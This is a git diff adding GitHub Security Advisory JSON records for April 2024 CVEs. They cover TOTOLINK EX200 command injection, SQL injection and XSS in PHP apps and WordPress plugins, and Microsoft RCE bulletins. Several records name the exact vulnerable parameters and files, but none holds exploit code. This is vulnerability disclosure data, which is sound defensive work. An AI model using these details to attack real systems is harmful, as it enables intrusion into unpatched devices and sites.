b/advisories/unreviewed/2024/04/GHSA-gmw5-2r8g-6fwc/GHSA-gmw5-2r8g-6fwc.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gmw5-2r8g-6fwc", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31811" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the langType parameter in the setLanguageCfg function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31811" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_1_setLanguageCfg/CI.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gp4v-h769-65rh/GHSA-gp4v-h769-65rh.json b/advisories/unreviewed/2024/04/GHSA-gp4v-h769-65rh/GHSA-gp4v-h769-65rh.json new file mode 100644 index 00000000000..16e09c38550 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gp4v-h769-65rh/GHSA-gp4v-h769-65rh.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gp4v-h769-65rh", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30697" + ], + "details": "An issue was discovered in ROS2 Galactic Geochelone in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext, allowing attackers to access sensitive information via a man-in-the-middle attack.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30697" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30697" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gpf5-g943-4fxx/GHSA-gpf5-g943-4fxx.json b/advisories/unreviewed/2024/04/GHSA-gpf5-g943-4fxx/GHSA-gpf5-g943-4fxx.json new file mode 100644 index 00000000000..abc56046319 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gpf5-g943-4fxx/GHSA-gpf5-g943-4fxx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpf5-g943-4fxx", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31815" + ], + "details": "In TOTOLINK EX200 V4.0.3c.7314_B20191204, an attacker can obtain the configuration file without authorization through /cgi-bin/ExportSettings.sh", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31815" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Leak_ExportSettings/Leak.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gppc-qq77-689m/GHSA-gppc-qq77-689m.json b/advisories/unreviewed/2024/04/GHSA-gppc-qq77-689m/GHSA-gppc-qq77-689m.json new file mode 100644 index 00000000000..269624c18eb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gppc-qq77-689m/GHSA-gppc-qq77-689m.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gppc-qq77-689m", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:34Z", + "aliases": [ + "CVE-2024-3442" + ], + "details": "A vulnerability classified as critical has been found in SourceCodester Prison Management System 1.0. This affects an unknown part of the file /Employee/delete_leave.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259695.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3442" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemSQL5.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259695" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259695" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312248" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gpww-pph3-m8m9/GHSA-gpww-pph3-m8m9.json b/advisories/unreviewed/2024/04/GHSA-gpww-pph3-m8m9/GHSA-gpww-pph3-m8m9.json new file mode 100644 index 00000000000..b388b6bb25e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gpww-pph3-m8m9/GHSA-gpww-pph3-m8m9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpww-pph3-m8m9", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26171" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26171" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26171" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gq8c-325r-rg8h/GHSA-gq8c-325r-rg8h.json b/advisories/unreviewed/2024/04/GHSA-gq8c-325r-rg8h/GHSA-gq8c-325r-rg8h.json new file mode 100644 index 00000000000..c2ae203f193 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gq8c-325r-rg8h/GHSA-gq8c-325r-rg8h.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq8c-325r-rg8h", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3535" + ], + "details": "A vulnerability, which was classified as critical, was found in Campcodes Church Management System 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259905 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3535" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%202.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259905" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259905" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312536" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gr3f-xv9f-q294/GHSA-gr3f-xv9f-q294.json b/advisories/unreviewed/2024/04/GHSA-gr3f-xv9f-q294/GHSA-gr3f-xv9f-q294.json new file mode 100644 index 00000000000..8392fd39ebe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gr3f-xv9f-q294/GHSA-gr3f-xv9f-q294.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gr3f-xv9f-q294", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26208" + ], + "details": "Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26208" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26208" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gvjj-h5vf-62m3/GHSA-gvjj-h5vf-62m3.json b/advisories/unreviewed/2024/04/GHSA-gvjj-h5vf-62m3/GHSA-gvjj-h5vf-62m3.json new file mode 100644 index 00000000000..cf3a77930c3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gvjj-h5vf-62m3/GHSA-gvjj-h5vf-62m3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvjj-h5vf-62m3", + "modified": "2024-04-07T15:30:32Z", + "published": "2024-04-07T15:30:32Z", + "aliases": [ + "CVE-2024-3423" + ], + "details": "A vulnerability was found in SourceCodester Online Courseware 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/activateteach.php. The manipulation of the argument selector leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259595.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3423" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-08.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259595" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259595" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311601" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T15:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gvx8-48wf-x3q7/GHSA-gvx8-48wf-x3q7.json b/advisories/unreviewed/2024/04/GHSA-gvx8-48wf-x3q7/GHSA-gvx8-48wf-x3q7.json new file mode 100644 index 00000000000..38216e9ad04 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gvx8-48wf-x3q7/GHSA-gvx8-48wf-x3q7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvx8-48wf-x3q7", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31257" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Formsite Formsite | Embed online forms to collect orders, registrations, leads, and surveys allows Stored XSS.This issue affects Formsite | Embed online forms to collect orders, registrations, leads, and surveys: from n/a through 1.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31257" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/formsite/wordpress-formsite-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gw7j-rv4v-wrcj/GHSA-gw7j-rv4v-wrcj.json b/advisories/unreviewed/2024/04/GHSA-gw7j-rv4v-wrcj/GHSA-gw7j-rv4v-wrcj.json new file mode 100644 index 00000000000..cd492766622 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gw7j-rv4v-wrcj/GHSA-gw7j-rv4v-wrcj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw7j-rv4v-wrcj", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-22450" + ], + "details": "Dell Alienware Command Center, versions prior to 6.2.7.0, contain an uncontrolled search path element vulnerability. A local malicious user could potentially inject malicious files in the file search path, leading to system compromise.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22450" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gwc6-967v-4vjj/GHSA-gwc6-967v-4vjj.json b/advisories/unreviewed/2024/04/GHSA-gwc6-967v-4vjj/GHSA-gwc6-967v-4vjj.json new file mode 100644 index 00000000000..d42550c5f82 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gwc6-967v-4vjj/GHSA-gwc6-967v-4vjj.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwc6-967v-4vjj", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3514" + ], + "details": "The Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tabs_color value in all versions up to, and including, 4.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3514" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040411%40responsive-tabs&new=3040411%40responsive-tabs&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2024-1846" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/ea2a8420-4b0e-4efb-a0c6-ceea996dae5a" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1b34a4aa-bcaa-4be5-a059-6f2efa3a8198?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gwg6-qpjp-9h2w/GHSA-gwg6-qpjp-9h2w.json b/advisories/unreviewed/2024/04/GHSA-gwg6-qpjp-9h2w/GHSA-gwg6-qpjp-9h2w.json new file mode 100644 index 00000000000..6fa471b9bbd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gwg6-qpjp-9h2w/GHSA-gwg6-qpjp-9h2w.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwg6-qpjp-9h2w", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3433" + ], + "details": "A vulnerability classified as problematic has been found in PuneethReddyHC Event Management 1.0. Affected is an unknown function of the file /backend/register.php. The manipulation of the argument event_id/full_name/email/mobile/college/branch leads to cross site scripting. It is possible to launch the attack remotely. VDB-259614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3433" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/177841/Event-Management-1.0-SQL-Injection.html" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259614" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259614" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.307744" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gwgm-pgv3-cwqf/GHSA-gwgm-pgv3-cwqf.json b/advisories/unreviewed/2024/04/GHSA-gwgm-pgv3-cwqf/GHSA-gwgm-pgv3-cwqf.json new file mode 100644 index 00000000000..fc307cb0467 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gwgm-pgv3-cwqf/GHSA-gwgm-pgv3-cwqf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwgm-pgv3-cwqf", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28909" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28909" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28909" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gwxj-rjc5-w9mq/GHSA-gwxj-rjc5-w9mq.json b/advisories/unreviewed/2024/04/GHSA-gwxj-rjc5-w9mq/GHSA-gwxj-rjc5-w9mq.json new file mode 100644 index 00000000000..7e3374868fb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gwxj-rjc5-w9mq/GHSA-gwxj-rjc5-w9mq.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwxj-rjc5-w9mq", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52552" + ], + "details": "Input verification vulnerability in the power module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52552" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gx42-cj7r-h5xp/GHSA-gx42-cj7r-h5xp.json b/advisories/unreviewed/2024/04/GHSA-gx42-cj7r-h5xp/GHSA-gx42-cj7r-h5xp.json new file mode 100644 index 00000000000..305b17d9fc3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gx42-cj7r-h5xp/GHSA-gx42-cj7r-h5xp.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gx42-cj7r-h5xp", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30708" + ], + "details": "An issue was discovered in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to cause a denial of service (DoS) via the ROS2 nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30708" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30708" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gx7g-x5pw-4h97/GHSA-gx7g-x5pw-4h97.json b/advisories/unreviewed/2024/04/GHSA-gx7g-x5pw-4h97/GHSA-gx7g-x5pw-4h97.json new file mode 100644 index 00000000000..db9a89ec75f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gx7g-x5pw-4h97/GHSA-gx7g-x5pw-4h97.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gx7g-x5pw-4h97", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-26277" + ], + "details": "A vulnerability has been identified in Parasolid V35.1 (All versions < V35.1.254), Parasolid V36.0 (All versions < V36.0.207), Parasolid V36.1 (All versions < V36.1.147). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted X_T files. An attacker could leverage this vulnerability to crash the application causing denial of service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26277" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-222019.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gxgx-2mvf-9gh5/GHSA-gxgx-2mvf-9gh5.json b/advisories/unreviewed/2024/04/GHSA-gxgx-2mvf-9gh5/GHSA-gxgx-2mvf-9gh5.json new file mode 100644 index 00000000000..c2005449160 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gxgx-2mvf-9gh5/GHSA-gxgx-2mvf-9gh5.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxgx-2mvf-9gh5", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-23080" + ], + "details": "Joda Time v2.12.5 was discovered to contain a NullPointerException via the component org.joda.time.format.PeriodFormat::wordBased(Locale).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23080" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/6614bfa658295d7af07a6d37e06db27f" + }, + { + "type": "WEB", + "url": "https://github.com/JodaOrg/joda-time" + }, + { + "type": "WEB", + "url": "http://joda.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gxj6-9wjm-8228/GHSA-gxj6-9wjm-8228.json b/advisories/unreviewed/2024/04/GHSA-gxj6-9wjm-8228/GHSA-gxj6-9wjm-8228.json new file mode 100644 index 00000000000..46164071bef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gxj6-9wjm-8228/GHSA-gxj6-9wjm-8228.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxj6-9wjm-8228", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-0080" + ], + "details": "\nNVIDIA nvTIFF Library for Windows and Linux contains a vulnerability where improper input validation might enable an attacker to use a specially crafted input file. A successful exploit of this vulnerability might lead to a partial denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0080" + }, + { + "type": "WEB", + "url": "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h28q-32f7-jxrv/GHSA-h28q-32f7-jxrv.json b/advisories/unreviewed/2024/04/GHSA-h28q-32f7-jxrv/GHSA-h28q-32f7-jxrv.json new file mode 100644 index 00000000000..ce786185f32 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h28q-32f7-jxrv/GHSA-h28q-32f7-jxrv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h28q-32f7-jxrv", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1412" + ], + "details": "The Memberpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘message’ and 'error' parameters in all versions up to, and including, 1.11.26 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Note - the issue was partially patched in 1.11.25, but could still potentially be exploited under some circumstances.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1412" + }, + { + "type": "WEB", + "url": "https://memberpress.com/change-log" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/882631ab-ef16-4158-adbc-60ad177ae6b8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h2xm-59gc-23mm/GHSA-h2xm-59gc-23mm.json b/advisories/unreviewed/2024/04/GHSA-h2xm-59gc-23mm/GHSA-h2xm-59gc-23mm.json new file mode 100644 index 00000000000..72190bf1c15 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h2xm-59gc-23mm/GHSA-h2xm-59gc-23mm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h2xm-59gc-23mm", + "modified": "2024-04-08T15:30:32Z", + "published": "2024-04-08T15:30:32Z", + "aliases": [ + "CVE-2024-31805" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 allows attackers to start the Telnet service without authorization via the telnet_enabled parameter in the setTelnetCfg function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31805" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_5_setTelnetCfg/CI.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h3j9-9865-w4pw/GHSA-h3j9-9865-w4pw.json b/advisories/unreviewed/2024/04/GHSA-h3j9-9865-w4pw/GHSA-h3j9-9865-w4pw.json new file mode 100644 index 00000000000..d18ced99b83 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h3j9-9865-w4pw/GHSA-h3j9-9865-w4pw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": 